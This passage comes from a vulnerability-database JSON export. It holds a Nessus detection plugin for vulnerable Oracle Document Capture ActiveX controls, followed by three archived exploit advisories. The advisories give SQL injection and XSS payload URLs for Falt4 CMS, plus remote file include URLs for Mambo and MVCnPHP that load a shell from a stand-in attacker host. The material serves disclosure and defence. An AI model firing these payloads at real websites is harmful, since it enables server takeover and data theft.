\"CVE-2010-3598\",\n \"CVE-2010-3599\"\n );\n script_bugtraq_id(45846, 45849, 45851, 45856, 45871);\n script_xref(name:\"EDB-ID\", value:\"16052\");\n script_xref(name:\"EDB-ID\", value:\"16053\");\n script_xref(name:\"EDB-ID\", value:\"16055\");\n script_xref(name:\"EDB-ID\", value:\"16056\");\n script_xref(name:\"Secunia\", value:\"42976\");\n\n script_name(english:\"Oracle Document Capture Multiple Vulnerabilities\");\n script_summary(english:\"Checks for Document Capture ActiveX controls.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has one or more ActiveX controls installed\nthat are affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Oracle Document Capture client installed on the remote host is\npotentially affected by multiple vulnerabilities :\n\n - An unspecified vulnerability exists in the Import Export\n utility. An attacker can exploit this to affect\n integrity. (CVE-2010-3598)\n\n - An information disclosure vulnerability exists related\n to the EasyMail ActiveX control. (CVE-2010-3595)\n\n - Insecure methods in the 'Actbar2.ocx' and 'empop3.dll'\n ActiveX controls can be exploited to overwrite arbitrary\n files. (CVE-2010-3591)\n\n - An error in the 'WriteJPG()' method in the NCSEcw.dll\n ActiveX control can be exploited to overwrite arbitrary\n files or potentially cause a buffer overflow.\n (CVE-2010-3599)\n\n - An unspecified vulnerability exists in the Internal\n Operations component. (CVE-2010-3592)\n\nNote that the NCSEcw.dll control is actually from the ERDAS ECW/JP2\nSDK developer toolkit from Intergraph.\");\n # https://web.archive.org/web/20110831133022/http://dsecrg.ru/pages/vul/show.php?id=306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a54d748d\");\n # https://web.archive.org/web/20110919025431/http://dsecrg.ru/pages/vul/show.php?id=307\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c14789b4\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\");\n # https://www.hexagongeospatial.com/en/technical-documents/ecw-jp2-sdk-security-advisory\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?347627fe\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using Oracle's Document Capture client, apply the patch from Oracle\nto disable the ActiveX controls.\n\nIf using a different application that includes the NCSEcw.dll control,\nset the kill bit for the affect control as discussed in Hexagon\nGeospatial's advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-3599\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nif (activex_init() != ACX_OK) exit(1, \"activex_init() failed.\");\n\nclsids = make_list(\n '{4932CEF4-2CAA-11D2-A165-0060081C43D9}',\n '{F647CBE5-3C01-402A-B3F0-502A77054A24}',\n '{10696DE0-CF47-4ad4-B1AE-CC1F4021D65B}',\n '{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}',\n '{DAFA4BF6-C807-463c-8745-C9E0C90CF84F}',\n '{D63891F1-E026-11D3-A6C3-005004055C6C}'\n);\n\n# Determine if any of the controls are installed.\ninfo = '';\ninstalls = 0;\n\nforeach clsid (clsids)\n{\n file = activex_get_filename(clsid:clsid);\n if (isnull(file))\n {\n activex_end();\n exit(1, \"activex_get_filename() returned NULL.\");\n }\n if (!file) continue;\n\n installs++;\n\n # Get its version\n version = activex_get_fileversion(clsid:clsid);\n if (!version) version = 'unknown';\n\n if (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0)\n {\n info += '\\n Class Identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version + '\\n';\n\n if (!thorough_tests) break;\n }\n}\nactivex_end();\n\n# Report findings.\nif (installs)\n{\n if (info)\n {\n if (report_paranoia > 1)\n {\n if (installs == 1) s = \" was\";\n else s = \"s were\";\n\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit' + s + '\\n' +\n 'set for the control\\'s CLSID because of the Report Paranoia setting' + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n if (installs == 1) s = \"its kill bit is not set so it is\";\n else s = \"their kill bits are not set so they are\";\n\n report = info +\n '\\n' +\n 'Moreover, ' + s + ' accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n exit(0);\n }\n else\n {\n if (installs == 1) exit(0, \"The control is installed but its kill bit is set.\");\n else exit(0, installs+\" instances of the controls are installed but their kill bits are set.\");\n }\n}\nelse exit(0, \"None of the affected controls are installed.\");\n", "cvss": {"score": 9.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-15T21:09:10", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-12-10T00:00:00", "published": "2007-12-10T00:00:00", "id": "1337DAY-ID-2351", "href": "https://0day.today/exploit/description/2351", "type": "zdt", "title": "Falt4 CMS RC4 10.9.2007 Multiple Remote Vulnerabilities", "sourceData": "=======================================================\r\nFalt4 CMS RC4 10.9.2007 Multiple Remote Vulnerabilities\r\n=======================================================\r\n\r\n\r\n\r\n H - Security Labs\r\n Falt4 CMS (RC4 10.9.2007) Security Report /Advisory\r\n ID : HSEC#20071012\r\n\r\nGeneral Information\r\n--------------------------\r\nName : Falt4Extreme CMS (RC4 10.9.2007)\r\nVendor HomePage :http://sourceforge.net/projects/falt4/\r\nPlatforms : PHP && MySQL\r\nVulnerability Type : Input Validation Errors\r\nDisclosure Timeline\r\n-------------------------\r\n04 December 2007 -- Vendor Contacted \r\n04 December 2007 -- Vendor Replied\r\n05 December 2007 -- Fix Released \r\n10 December 2007 -- Pulic Disclosure\r\n\r\nWhat is Falt4Extreme\r\n------------------------\r\nFalt4 CMS is a business approved Content Management System (CMS) under the LGPL. The CMS is feature-rich and has a clean administration area. The ultimate CMS with functions for the professional, usable by everyone.CMS modules are available.\r\nOverview of Vulnerabilities\r\n------------------------\r\nThe script is vulnerable to both of XSS and Blind SQL Injection attacks.\r\nDetails of Vulnerabilities\r\n------------------------\r\n1-Blind SQL Injection Vulnerability:\r\nhttp://www.EXAMPLE.com/falt4/\r\nindex.php?handler=cat&nav_ID=1'%20and%20'1'='1\r\nnav_ID parameter is not sanitized properly and can be used for Blind SQL Injection attacks.\r\n2-Cross Site Scripting Vulnerabilities\r\ni.http://www.EXAMPLE.com/falt4/\r\nindex.php?handler=>\"><script>alert(3)</script>&nav_ID=1\r\nInput passed to the 'handler' parameter is not sanitized properly before using and can be used by malicious people to perform XSS attacks.\r\nii .http://www.EXAMPLE.com/falt4/\r\nmodules/feed/feed.php?type=rss&lang=1&topic=>\"><script>alert(2)</script>\r\nInput passed to the 'topic' parameter is not sanitized properly before using and can be used by malicious people to perform XSS attacks.\r\nSolution\r\n-----------------------\r\nRe-download falt4 from sourceforge:\r\nhttp://downloads.sourceforge.net/falt4/falt4extreme.zip?use_mirror=osdn\r\nReplace these files:\r\n/yourfalt4/index.php\r\n/yourfalt4/modules/feed.php\r\n/yourfalt4/admin/index.php\r\n-----------------------\r\nThe vulnerabilities found on 04 December 2007\r\nGebze Institue of Technology, Computer Engineering, http://www.gyte.edu.tr\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2351"}, {"lastseen": "2018-03-05T21:35:10", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-09-14T00:00:00", "published": "2006-09-14T00:00:00", "id": "1337DAY-ID-833", "href": "https://0day.today/exploit/description/833", "type": "zdt", "title": "Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability", "sourceData": "==================================================================\r\nMambo com_serverstat Component <= 0.4.4 File Include Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=\r\n+\r\n+Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability\r\n+\r\n=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=\r\n+\r\n+Author: xoron (turkish hacker)\r\n+\r\n=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=\r\n+\r\n+Class : Remote\r\n+\r\n=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=\r\n+\r\n+Vuln Code: require_once($mosConfig_absolute_path.\"/administrator/components/com_serverstat/config.serverstat.php\");\r\n+\r\n=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=\r\n+\r\n+Exploit: administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://evil_scripts?\r\n+\r\n=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=\r\n+\r\nThanx : str0ke, Ironfist, Preddy, SHiKaA\r\n+\r\n=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=\r\n\r\n\r\n\n# 0day.today [2018-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/833"}, {"lastseen": "2018-01-05T19:10:18", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-08-10T00:00:00", "published": "2006-08-10T00:00:00", "id": "1337DAY-ID-684", "href": "https://0day.today/exploit/description/684", "type": "zdt", "title": "MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities", "sourceData": "====================================================================\r\nMVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities\r\n====================================================================\r\n\r\n\r\n\r\nMVCnPHP Remote File Inclusion\r\n\r\n############ToXiC CrEw###############\r\n\r\nBug Found by Drago84\r\n\r\n\r\nPage Affect:\r\nBaseCommand.php\r\nBaseLoader.php\r\nBaseView.php\r\n\r\nExP:\r\nhttp://www.sito.com/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php\r\nhttp://www.sito.com/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php\r\nhttp://www.sito.com/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/684"}]}
